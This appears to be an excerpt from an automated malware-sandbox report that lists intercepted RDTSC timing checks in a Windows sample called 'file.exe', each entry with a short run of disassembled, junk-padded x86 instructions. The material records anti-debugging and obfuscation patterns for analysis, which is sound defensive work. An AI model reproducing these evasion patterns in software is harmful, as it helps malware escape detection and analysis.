                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E61C5E second address: E61C62 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E60FAC second address: E60FB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E61C62 second address: E61C85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F450CC4A617h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E61C85 second address: E61C9E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F450CC4AB21h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E61C9E second address: E61D01 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F450CC4A613h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push ebp 0x0000000e call 00007F450CC4A608h 0x00000013 pop ebp 0x00000014 mov dword ptr [esp+04h], ebp 0x00000018 add dword ptr [esp+04h], 00000016h 0x00000020 inc ebp 0x00000021 push ebp 0x00000022 ret 0x00000023 pop ebp 0x00000024 ret 0x00000025 mov esi, dword ptr [ebp+122D205Fh] 0x0000002b push 00000000h 0x0000002d push edx 0x0000002e mov dword ptr [ebp+122D2195h], edx 0x00000034 pop esi 0x00000035 add di, F52Ch 0x0000003a push 00000000h 0x0000003c sub edi, dword ptr [ebp+122D297Dh] 0x00000042 mov esi, 4EA567A9h 0x00000047 push eax 0x00000048 pushad 0x00000049 je 00007F450CC4A60Ch 0x0000004f push eax 0x00000050 push edx 0x00000051 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E667DA second address: E667DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E677E0 second address: E677EE instructions: 0x00000000 rdtsc 0x00000002 jg 00007F450CC4A606h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E677EE second address: E677F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E677F2 second address: E67856 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F450CC4A60Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ebx 0x00000010 call 00007F450CC4A608h 0x00000015 pop ebx 0x00000016 mov dword ptr [esp+04h], ebx 0x0000001a add dword ptr [esp+04h], 00000019h 0x00000022 inc ebx 0x00000023 push ebx 0x00000024 ret 0x00000025 pop ebx 0x00000026 ret 0x00000027 mov bx, si 0x0000002a push 00000000h 0x0000002c and bl, 0000002Eh 0x0000002f push 00000000h 0x00000031 or edi, dword ptr [ebp+122D2E28h] 0x00000037 jmp 00007F450CC4A616h 0x0000003c xchg eax, esi 0x0000003d jbe 00007F450CC4A61Ch 0x00000043 push eax 0x00000044 push edx 0x00000045 push ebx 0x00000046 pop ebx 0x00000047 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E686CF second address: E686D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E679C1 second address: E679DF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jns 00007F450CC4A606h 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 jmp 00007F450CC4A60Bh 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E679DF second address: E679E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F450CC4AB16h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E688E7 second address: E688ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E695E5 second address: E695E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E679E9 second address: E67A76 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F450CC4A606h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d mov edi, dword ptr [ebp+122D233Eh] 0x00000013 push dword ptr fs:[00000000h] 0x0000001a push 00000000h 0x0000001c push ecx 0x0000001d call 00007F450CC4A608h 0x00000022 pop ecx 0x00000023 mov dword ptr [esp+04h], ecx 0x00000027 add dword ptr [esp+04h], 00000019h 0x0000002f inc ecx 0x00000030 push ecx 0x00000031 ret 0x00000032 pop ecx 0x00000033 ret 0x00000034 mov dword ptr fs:[00000000h], esp 0x0000003b pushad 0x0000003c jbe 00007F450CC4A606h 0x00000042 movsx eax, cx 0x00000045 popad 0x00000046 mov eax, dword ptr [ebp+122D0B9Dh] 0x0000004c add dword ptr [ebp+122D2730h], esi 0x00000052 push FFFFFFFFh 0x00000054 push 00000000h 0x00000056 push eax 0x00000057 call 00007F450CC4A608h 0x0000005c pop eax 0x0000005d mov dword ptr [esp+04h], eax 0x00000061 add dword ptr [esp+04h], 0000001Dh 0x00000069 inc eax 0x0000006a push eax 0x0000006b ret 0x0000006c pop eax 0x0000006d ret 0x0000006e mov ebx, dword ptr [ebp+122DB252h] 0x00000074 nop 0x00000075 push eax 0x00000076 push edx 0x00000077 push eax 0x00000078 push edx 0x00000079 push eax 0x0000007a push edx 0x0000007b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E695E9 second address: E695EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E67A76 second address: E67A7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E68987 second address: E6898C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E695EF second address: E695F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E67A7A second address: E67A80 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E67A80 second address: E67A8A instructions: 0x00000000 rdtsc 0x00000002 js 00007F450CC4A60Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E6975E second address: E6978B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F450CC4AB23h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F450CC4AB24h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E6B522 second address: E6B526 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E6C5D1 second address: E6C5F5 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F450CC4AB16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F450CC4AB27h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E6C5F5 second address: E6C5FA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E6A6AA second address: E6A6B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E6C5FA second address: E6C67D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F450CC4A606h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d nop 0x0000000e movsx ebx, di 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push edi 0x00000016 call 00007F450CC4A608h 0x0000001b pop edi 0x0000001c mov dword ptr [esp+04h], edi 0x00000020 add dword ptr [esp+04h], 0000001Dh 0x00000028 inc edi 0x00000029 push edi 0x0000002a ret 0x0000002b pop edi 0x0000002c ret 0x0000002d mov dword ptr [ebp+122D1A0Ch], edx 0x00000033 jmp 00007F450CC4A60Fh 0x00000038 push 00000000h 0x0000003a push esi 0x0000003b jnp 00007F450CC4A609h 0x00000041 pop ebx 0x00000042 xchg eax, esi 0x00000043 jmp 00007F450CC4A60Ch 0x00000048 push eax 0x00000049 push eax 0x0000004a push edx 0x0000004b pushad 0x0000004c jmp 00007F450CC4A616h 0x00000051 push eax 0x00000052 push edx 0x00000053 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E6A6B3 second address: E6A6D7 instructions: 0x00000000 rdtsc 0x00000002 je 00007F450CC4AB16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f je 00007F450CC4AB16h 0x00000015 jmp 00007F450CC4AB1Eh 0x0000001a popad 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E6C67D second address: E6C682 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E6A6D7 second address: E6A6DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E6A6DD second address: E6A6E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E6A6E1 second address: E6A6E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E6D7E8 second address: E6D7FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F450CC4A611h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E6A794 second address: E6A7A2 instructions: 0x00000000 rdtsc 0x00000002 je 00007F450CC4AB16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E70804 second address: E70818 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F450CC4A60Fh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E70818 second address: E70893 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jmp 00007F450CC4AB21h 0x0000000d nop 0x0000000e mov ebx, dword ptr [ebp+122D1AA2h] 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push esi 0x00000019 call 00007F450CC4AB18h 0x0000001e pop esi 0x0000001f mov dword ptr [esp+04h], esi 0x00000023 add dword ptr [esp+04h], 0000001Bh 0x0000002b inc esi 0x0000002c push esi 0x0000002d ret 0x0000002e pop esi 0x0000002f ret 0x00000030 push 00000000h 0x00000032 mov ebx, dword ptr [ebp+122D2A89h] 0x00000038 xchg eax, esi 0x00000039 jl 00007F450CC4AB20h 0x0000003f pushad 0x00000040 jo 00007F450CC4AB16h 0x00000046 push edx 0x00000047 pop edx 0x00000048 popad 0x00000049 push eax 0x0000004a push eax 0x0000004b push edx 0x0000004c pushad 0x0000004d jno 00007F450CC4AB16h 0x00000053 jmp 00007F450CC4AB22h 0x00000058 popad 0x00000059 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E70893 second address: E7089D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F450CC4A606h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E7089D second address: E708A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E718BD second address: E71908 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a add bx, 371Ah 0x0000000f push 00000000h 0x00000011 mov ebx, 1C91E7DDh 0x00000016 push 00000000h 0x00000018 push 00000000h 0x0000001a push esi 0x0000001b call 00007F450CC4A608h 0x00000020 pop esi 0x00000021 mov dword ptr [esp+04h], esi 0x00000025 add dword ptr [esp+04h], 00000016h 0x0000002d inc esi 0x0000002e push esi 0x0000002f ret 0x00000030 pop esi 0x00000031 ret 0x00000032 cmc 0x00000033 push eax 0x00000034 pushad 0x00000035 push eax 0x00000036 push edx 0x00000037 jmp 00007F450CC4A610h 0x0000003c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E729E4 second address: E729F5 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F450CC4AB16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E729F5 second address: E72A00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F450CC4A606h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E6E8B0 second address: E6E8B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E6E8B5 second address: E6E8BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E748EC second address: E748F1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E748F1 second address: E748F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E6E8BB second address: E6E8C8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E6E8C8 second address: E6E8CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E75907 second address: E759B4 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push ebx 0x0000000c call 00007F450CC4AB18h 0x00000011 pop ebx 0x00000012 mov dword ptr [esp+04h], ebx 0x00000016 add dword ptr [esp+04h], 0000001Dh 0x0000001e inc ebx 0x0000001f push ebx 0x00000020 ret 0x00000021 pop ebx 0x00000022 ret 0x00000023 jmp 00007F450CC4AB28h 0x00000028 and ebx, 7EFE7F4Dh 0x0000002e push 00000000h 0x00000030 sub dword ptr [ebp+122D2EC5h], eax 0x00000036 push 00000000h 0x00000038 push 00000000h 0x0000003a push edx 0x0000003b call 00007F450CC4AB18h 0x00000040 pop edx 0x00000041 mov dword ptr [esp+04h], edx 0x00000045 add dword ptr [esp+04h], 0000001Dh 0x0000004d inc edx 0x0000004e push edx 0x0000004f ret 0x00000050 pop edx 0x00000051 ret 0x00000052 or dword ptr [ebp+122D2CD4h], edi 0x00000058 xchg eax, esi 0x00000059 pushad 0x0000005a jmp 00007F450CC4AB27h 0x0000005f push eax 0x00000060 push edx 0x00000061 jmp 00007F450CC4AB21h 0x00000066 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E6F983 second address: E6F9A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F450CC4A612h 0x00000009 popad 0x0000000a pop esi 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E6F9A1 second address: E6F9A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E7969F second address: E796C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F450CC4A610h 0x00000009 jmp 00007F450CC4A611h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E7A0FC second address: E7A102 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E7E5F0 second address: E7E60F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F450CC4A615h 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E7EA35 second address: E7EA40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F450CC4AB16h 0x0000000a pop esi 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E7EA40 second address: E7EA51 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F450CC4A60Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E7EA51 second address: E7EA5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F450CC4AB16h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E70A4C second address: E70A56 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F450CC4A606h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E71A59 second address: E71A5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E71A5D second address: E71A6C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push eax 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E71A6C second address: E71A71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E71A71 second address: E71A76 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E71B29 second address: E71B2D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E71B2D second address: E71B33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E71B33 second address: E71B44 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F450CC4AB1Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E72BB1 second address: E72BBB instructions: 0x00000000 rdtsc 0x00000002 jng 00007F450CC4A60Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E73A4A second address: E73A51 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E75AF8 second address: E75AFD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E75AFD second address: E75B1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F450CC4AB26h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E851C6 second address: E851D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F450CC4A606h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E8C7D5 second address: E8C7DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E8C7DF second address: E8C7E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E8B500 second address: E8B516 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 je 00007F450CC4AB16h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 jc 00007F450CC4AB16h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E8BD7E second address: E8BD84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E8BD84 second address: E8BD8A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E8BD8A second address: E8BD8F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E8BD8F second address: E8BD9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a pop esi 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E8BD9A second address: E8BD9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E8BF3F second address: E8BF5A instructions: 0x00000000 rdtsc 0x00000002 je 00007F450CC4AB22h 0x00000008 pushad 0x00000009 push edx 0x0000000a pop edx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E8C0C0 second address: E8C0CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jnl 00007F450CC4A606h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E8C0CD second address: E8C0DE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F450CC4AB1Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E8C0DE second address: E8C0F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F450CC4A611h 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E8C0F5 second address: E8C0F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E92C0A second address: E92C18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 jno 00007F450CC4A606h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E919D4 second address: E919FA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F450CC4AB1Fh 0x00000007 jmp 00007F450CC4AB20h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E91B7C second address: E91B81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E91B81 second address: E91B86 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E91B86 second address: E91B8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E92496 second address: E9249A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
